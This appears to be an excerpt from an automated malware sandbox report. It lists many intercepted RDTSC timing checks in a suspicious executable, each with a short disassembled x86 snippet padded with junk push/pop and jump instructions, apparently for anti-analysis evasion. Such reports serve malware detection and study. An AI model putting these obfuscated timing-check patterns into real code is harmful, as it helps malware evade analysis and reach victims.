Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F4EB second address: 30F527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7FDCFD2296h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jns 00007F7FDCFD229Eh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007F7FDCFD22A9h 0x00000021 jmp 00007F7FDCFD22A3h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F527 second address: 30F571 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7FDD3F1879h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e jmp 00007F7FDD3F1876h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7FDD3F186Bh 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F5F5 second address: 30F5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F5F9 second address: 30F62A instructions: 0x00000000 rdtsc 0x00000002 je 00007F7FDD3F187Eh 0x00000008 jmp 00007F7FDD3F1878h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jl 00007F7FDD3F1872h 0x00000016 jc 00007F7FDD3F186Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F6E7 second address: 30F6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FDB1 second address: 30FDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FDB5 second address: 30FDED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 0000001Eh 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F7FDCFD2298h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2AB1h], edi 0x0000002c nop 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jne 00007F7FDCFD2296h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FDED second address: 30FDF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FDF6 second address: 30FE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD22A3h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3101EA second address: 31023B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7FDD3F1866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F7FDD3F186Ch 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F7FDD3F1868h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e lea eax, dword ptr [ebp+12483CC8h] 0x00000034 mov dword ptr [ebp+122DBB9Eh], eax 0x0000003a nop 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jc 00007F7FDD3F1866h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F4885 second address: 2F488B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F488B second address: 2F48AB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7FDD3F1866h 0x00000008 jmp 00007F7FDD3F1873h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3467CA second address: 3467CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3467CE second address: 3467D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34693C second address: 346942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346942 second address: 34695F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Fh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F7FDD3F186Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34695F second address: 346963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346963 second address: 34699A instructions: 0x00000000 rdtsc 0x00000002 js 00007F7FDD3F1868h 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F7FDD3F1874h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F7FDD3F186Ch 0x00000018 jng 00007F7FDD3F186Eh 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346B23 second address: 346B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7FDCFD229Ch 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346B33 second address: 346B38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346B38 second address: 346B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34ACAC second address: 34ACB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34F67C second address: 34F6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD229Ah 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F7FDCFD22A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 350497 second address: 3504A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007F7FDD3F1868h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34EDDB second address: 34EE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F7FDCFD22A4h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7FDCFD22A3h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 353BF6 second address: 353C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1870h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7FDD3F1875h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 353C23 second address: 353C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 356BD7 second address: 356C15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7FDD3F186Ch 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F7FDD3F1877h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007F7FDD3F1870h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3567E7 second address: 3567EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3567EB second address: 3567EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597A5 second address: 3597AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7FDCFD2296h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597AF second address: 3597B9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7FDD3F1866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597B9 second address: 3597C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597C2 second address: 3597DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F7FDD3F186Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597DA second address: 3597E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359925 second address: 35992A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35992A second address: 359930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359930 second address: 35993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7FDD3F1866h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35993C second address: 359944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359944 second address: 359952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359952 second address: 359956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359956 second address: 359980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7FDD3F1874h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35FBC7 second address: 35FBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35FBCC second address: 35FBD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35FBD2 second address: 35FBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7FDCFD2296h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35FBDC second address: 35FC01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Ah 0x00000007 jnp 00007F7FDD3F1866h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jl 00007F7FDD3F1866h 0x00000016 push edx 0x00000017 pop edx 0x00000018 jns 00007F7FDD3F1866h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C8D1E second address: 2C8D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDCFD22A5h 0x00000009 jg 00007F7FDCFD2296h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35F33F second address: 35F35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7FDD3F1878h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35F35D second address: 35F37E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7FDCFD22A7h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35F37E second address: 35F38F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F7FDD3F1872h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35F8ED second address: 35F91E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7FDCFD22A7h 0x00000008 je 00007F7FDCFD2296h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F7FDCFD229Bh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 362D6C second address: 362D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 362D70 second address: 362D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 362D74 second address: 362D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7FDD3F1879h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36308A second address: 36309B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F7FDCFD2296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36309B second address: 3630A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 369203 second address: 36920D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 367D8F second address: 367DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F1874h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 367DAA second address: 367DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 367DAF second address: 367DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36804F second address: 36806E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7FDCFD22A7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36806E second address: 368080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F186Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 368080 second address: 368091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jl 00007F7FDCFD2296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 368091 second address: 3680A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 ja 00007F7FDD3F1866h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3680A2 second address: 3680B6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7FDCFD229Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FBA1 second address: 30FBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F186Dh 0x00000009 popad 0x0000000a jp 00007F7FDD3F1868h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7FDD3F186Dh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 368F1D second address: 368F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F7FDCFD2296h 0x00000009 jmp 00007F7FDCFD22A3h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E6BC second address: 36E6C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E6C2 second address: 36E6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E6C8 second address: 36E6E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7FDD3F1870h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E81D second address: 36E823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E823 second address: 36E829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E968 second address: 36E96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E96D second address: 36E98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7FDD3F1866h 0x00000009 jnp 00007F7FDD3F1866h 0x0000000f jmp 00007F7FDD3F186Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E98C second address: 36E9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7FDCFD229Ah 0x0000000e pushad 0x0000000f jl 00007F7FDCFD2296h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E9A8 second address: 36E9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F00A second address: 36F013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F305 second address: 36F309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F309 second address: 36F30F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F30F second address: 36F315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F315 second address: 36F31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F31B second address: 36F325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7FDD3F1866h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5B6 second address: 36F5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5BF second address: 36F5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5C5 second address: 36F5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5CC second address: 36F5D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
